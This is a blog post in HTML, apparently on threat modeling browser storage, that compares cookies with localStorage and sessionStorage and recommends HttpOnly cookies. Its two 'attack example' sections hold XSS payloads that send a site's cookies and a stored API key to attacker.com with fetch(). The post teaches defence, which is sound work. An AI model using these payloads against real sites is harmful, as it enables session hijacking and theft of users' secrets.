<h4 id="attack-example--xss-stealing-cookies"><span class="me-2">Attack Example : XSS Stealing Cookies</span><a href="#attack-example--xss-stealing-cookies" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>Suppose a website mybank.com has an XSS vulnerability in its search feature. An attacker could craft a malicious link:</p>

<div class="language-js highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nx">mybank</span><span class="p">.</span><span class="nx">com</span><span class="o">/</span><span class="nx">search</span><span class="p">?</span><span class="nx">query</span><span class="o">=&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://attacker.com/steal?cookie=</span><span class="dl">'</span> <span class="o">+</span> <span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span><span class="o">&lt;</span><span class="sr">/script&gt;</span><span class="err">.
</span></pre></td></tr></tbody></table></code></div></div>
<p>If a logged-in user clicks this link (or it’s embedded in a malicious ad on the page), the script executes in the context of mybank.com. It grabs all accessible cookies (like the session cookie sessionID=xyz123abc) and sends them to the attacker’s server. The attacker can then use this sessionID to impersonate the user on mybank.com.”</p>

<h3 id="web-storage-api"><span class="me-2"><a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Storage_API/Using_the_Web_Storage_API">Web Storage API</a></span><a href="#web-storage-api" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Web storage API provides a mechanism to store key-value pairs in the browser. It is generally divided into Local Storage and Session Storage.</p>
<h5 id="local-storage"><span class="me-2"><strong>Local Storage</strong></span><a href="#local-storage" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<p>Local storage is a feature in web browsers that lets web developers save data in users’ browsers. It is part of the Web Storage API along with Session Storage. When users request a webpage, the server sends data and the Javascript code to save in the browser — local Storage stores data as key-value pairs. Data saved through local storage persists on the browser when the page is closed or refreshed. Data in localStorage is saved using the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Storage/setItem">localStorage.setItem()</a> method.</p>

<p><a href="/assets/img/localset.png" class="popup img-link shimmer"><img src="/assets/img/localset.png" alt="localset" loading="lazy"></a></p>

<p>The stored data can be retrieved by the javascript running on the browser with it’s key by using the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Storage/getItem">localStorage.getItem(“key”)</a></p>

<p><a href="/assets/img/localget.png" class="popup img-link shimmer"><img src="/assets/img/localget.png" alt="localget" loading="lazy"></a></p>

<p>Once stored in Local Storage, data must be cleared explicitly ( using methods like <a href="https://developer.mozilla.org/en-US/docs/Web/API/Storage/removeItem">removeItem()</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Storage/clear">clear()</a> ); i.e., it remains unless explicitly cleared. Data stored in Local Storage is scoped to the document’s origin.</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th><strong>Attribute</strong></th>
      <th><strong>Details</strong></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><strong>Use Case</strong></td>
      <td>Storing larger amounts of data client-side, web app configurations, non-sensitive user preferences, offline data, cached assets</td>
    </tr>
    <tr>
      <td><strong>Expiration</strong></td>
      <td>Persistent until explicitly cleared by code or user. Survives browser restarts and OS reboots</td>
    </tr>
    <tr>
      <td><strong>Data Capacity</strong></td>
      <td>~ 5-10 MB (varies by browser). Significantly larger than cookies</td>
    </tr>
    <tr>
      <td><strong>Constraints</strong></td>
      <td>- JavaScript access only (no server access)- Same-origin policy applies- Synchronous operations can block main thread</td>
    </tr>
  </tbody>
</table></div>

<h4 id="who-can-access-local-storage-associated-with-a-domain"><span class="me-2">Who can access Local Storage associated with a domain?</span><a href="#who-can-access-local-storage-associated-with-a-domain" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<h5 id="same-origin-access-1"><span class="me-2">Same-Origin Access</span><a href="#same-origin-access-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<p>Similar to the cookie, access to localStorage is governed by the Same-Origin Policy. Data stored in the Local Storage is shared between all tabs and windows from the same origin. There are no attributes that can restrict access to data stored in localStorage.</p>
<h5 id="browser-access-1"><span class="me-2">Browser Access</span><a href="#browser-access-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<ul>
  <li>Users can view and clear localStorage data through browser developer tools or settings</li>
  <li>Browser extensions with appropriate permissions can read/modify localStorage content</li>
  <li>The browser will control access to localStorage by an application using the same-origin policy, so data is accessible only for scripts from the same domain that created it.</li>
  <li>Unlike cookies, localStorage data persists indefinitely until explicitly cleared by the user or application.</li>
  <li>The browser enforces a storage limit (usually around 5-10 MB) for localStorage per domain.
    <h5 id="server-side-access-1"><span class="me-2">Server-Side Access</span><a href="#server-side-access-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
  </li>
  <li>The web server and backend services cannot directly access localStorage data since it remains client-side only.</li>
  <li>localStorage data is not automatically sent with HTTP requests like cookies are.</li>
  <li>You need to share data in localStorage with the server: You need to consciously read it using JavaScript and send it using AJAX/fetch requests or form submissions.</li>
  <li>Load balancers and proxies never see localStorage data because it remains within the browser.
    <h5 id="session-storage"><span class="me-2"><strong>Session Storage</strong></span><a href="#session-storage" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
  </li>
</ul>

<p><code class="language-plaintext highlighter-rouge">sessionStorage</code> is similar to <code class="language-plaintext highlighter-rouge">localStorage</code>, but stores data only needed for the current session. The data is cleared when the user navigates away from the page, or the browser is closed.</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th><strong>Attribute</strong></th>
      <th><strong>Details</strong></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><strong>Use Case</strong></td>
      <td>Temporary data storage during a single page session, form data backup, per-tab state management, temporary user preferences</td>
    </tr>
    <tr>
      <td><strong>Expiration</strong></td>
      <td>Data persists only for the duration of the page session. Cleared when tab/window is closed</td>
    </tr>
    <tr>
      <td><strong>Data Capacity</strong></td>
      <td>~5-10 MB (varies by browser). Similar to localStorage</td>
    </tr>
    <tr>
      <td><strong>Constraints</strong></td>
      <td>- JavaScript access only (no server access)- Same-origin policy applies- Limited to single browser tab/window which created the session storage- Synchronous operations</td>
    </tr>
  </tbody>
</table></div>

<h5 id="who-can-access-localstorage-associated-with-a-domain"><span class="me-2">Who can access localStorage associated with a domain?</span><a href="#who-can-access-localstorage-associated-with-a-domain" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<h6 id="same-origin-access-2">Same-Origin Access</h6>
<p>Similar to localStorage, access to localStorage is governed by the Same-Origin Policy. Unlike localStorage, data stored in sessionStorage is not shared between all tabs and windows from the same origin. It is only accessible within the same tab/window that created it. Each tab/window gets its own separate sessionStorage instance, even from the same origin.</p>
<h6 id="browser-access-2">Browser Access</h6>
<p>In terms of Browser Access, access to sessionStorage is similar to that of localStorage except for two distinct differences,</p>
<ul>
  <li>Unlike localStorage, sessionStorage data is cleared automatically when the tab/window is closed.</li>
  <li>Each browser tab maintains its own separate sessionStorage instance, even for the same domain.
    <h6 id="server-side-access-2">Server-Side Access</h6>
    <p>Server-Side Access of sessionStorage is similar to that of the localStorage.</p>
    <h4 id="security-considerations-1"><span class="me-2">Security Considerations</span><a href="#security-considerations-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
  </li>
  <li>Same Origin Policy applies for Local Storage and Session Storage. Access to data is protected using the same origin policy, where data stored is scoped to the document’s origin, meaning the webpage can only access data if it has the same origin by default.</li>
  <li>Local Storage and Session Storage is accessible to Javascript running on the pages with the same origin. Any XSS vulnerabilities present in the site, poses significant risk. There is also no equivalent attribute like <code class="language-plaintext highlighter-rouge">HTTPOnly</code> which can be used. Thus storing any critical data is not recommended.</li>
  <li>All data in Local Storage and Session Storage is not encrypted by default and stored in plain text. Encrypting client side storage is a difficult problem to solve and not straight forward. While developers can attempt to encrypt data before storing it and decrypt it upon retrieval using JavaScript, managing the encryption keys securely on the client-side is very challenging. If the key is also stored on the client or easily derivable, the encryption offers little real protection against an attacker who has XSS or physical access.</li>
</ul>

<h4 id="attack-example-xss-stealing-api-keys-from-localstorage"><span class="me-2">Attack Example: XSS Stealing API Keys from localStorage</span><a href="#attack-example-xss-stealing-api-keys-from-localstorage" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>Suppose a web application coolservice.com stores a user’s API key for a third-party service in localStorage to make client-side API calls: localStorage.setItem(‘apiKey’, ‘user_secret_api_key_here’);.</p>

<p>If coolservice.com has an XSS vulnerability (e.g., in a comments section), an attacker could inject the following script:</p>

<div class="language-js highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span> <span class="kd">var</span> <span class="nx">apiKey</span> <span class="o">=</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nf">getItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">apiKey</span><span class="dl">'</span><span class="p">);</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://attacker.com/steal_token?token=</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">apiKey</span><span class="p">);</span> <span class="o">&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span></pre></td></tr></tbody></table></code></div></div>

<p>When another user views the page with the malicious comment, this script runs, reads the apiKey from localStorage, and sends it to the attacker’s server. Since localStorage items are not protected by an HttpOnly-like mechanism, any JavaScript running on the page can access them.”</p>

<h3 id="key-difference-between-cookies--localsession-storage-in-terms-of-security"><span class="me-2">Key Difference between Cookies &amp; local/session Storage in terms of Security</span><a href="#key-difference-between-cookies--localsession-storage-in-terms-of-security" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<ul>
  <li>Cookies are sent with every request but local/session Storage  which decreases the attack surface.</li>
  <li>Javascript running on pages within the same origin can access data stored in local/session Storage, while we can deny access to cookies by using attributes like <code class="language-plaintext highlighter-rouge">HTTPOnly</code>.</li>
  <li>There are no built-in attributes for security configuration for local/session Storage but access to cookies can be configured using built-in attributes.</li>
  <li>Cookies offer attributes like HttpOnly, Secure, SameSite, Path, and Domain for fine-grained control over their transmission and accessibility, which Web Storage lacks.</li>
</ul>

<h3 id="conclusion"><span class="me-2">Conclusion</span><a href="#conclusion" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<ul>
  <li>The difference between localStorage and cookies is mostly about what is being stored and intended use cases,
    <ul>
      <li>Cookies are better for session management and authentication, Security-sensitive information (when properly configured), and data that needs to be sent to the server in each request for Server-side processing.</li>
      <li>localStorage is better for client-side data, UI preferences, Cached data, and Non-sensitive information.</li>
    </ul>
  </li>
</ul>

<p>Cookies should be used for session management and authentication because of their flexible security controls. It is also vital to have proper restrictions in place for access to cookies with available security attributes instead of relying on localStorage, which doesn’t support these built-in protections.</p>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/security/">Security</a>,
          <a href="/categories/web/">Web</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/threatmodeling/"
            class="post-tag no-text-decoration"
          >threatmodeling</a>
        
          <a
            href="/tags/web/"
            class="post-tag no-text-decoration"
          >web</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=Threat%20Modeling%20Browser%E2%80%99s%20Storage%20-%20Seku's%20Blog&url=https%3A%2F%2Fsureshpantha.com.np%2Fposts%2FThreat-Modeling-Browser-s-Storage%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=Threat%20Modeling%20Browser%E2%80%99s%20Storage%20-%20Seku's%20Blog&u=https%3A%2F%2Fsureshpantha.com.np%2Fposts%2FThreat-Modeling-Browser-s-Storage%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fsureshpantha.com.np%2Fposts%2FThreat-Modeling-Browser-s-Storage%2F&text=Threat%20Modeling%20Browser%E2%80%99s%20Storage%20-%20Seku's%20Blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Threat-Modeling-Browser-s-Storage/">Threat Modeling Browser’s Storage</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/threatmodeling/">threatmodeling</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  
    











            
              
              
            

            
          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/threatmodeling/">threatmodeling</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{content}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

